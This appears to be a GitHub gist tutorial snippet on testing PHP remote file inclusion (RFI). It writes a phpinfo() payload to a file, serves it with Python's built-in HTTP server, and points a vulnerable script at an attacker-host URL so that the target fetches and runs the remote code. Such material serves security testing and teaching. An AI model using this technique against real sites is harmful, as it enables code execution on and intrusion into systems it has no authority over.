Created
August 12, 2019 22:34
-
-
Save jakekarnes42/938d3fbd7a87bdb7fde02fbcb69f8bc0 to your computer and use it in GitHub Desktop.
Example for testing PHP RFI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ mkdir evil_files | |
| $ cat > evil_files/phpinfo.txt | |
| <?php | |
| phpinfo(); | |
| ?> | |
| Next, we need to serve the file. Python has a built in web server module we can use for this. | |
| $ cd evil_files | |
| $ python -m SimpleHTTPServer | |
| Serving HTTP on 0.0.0.0 port 8000 ... | |
| Now we just need to point our vulnerable script at our attacking system, with the following URI: | |
| http://<attack_ip>:8000/phpinfo.txt |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment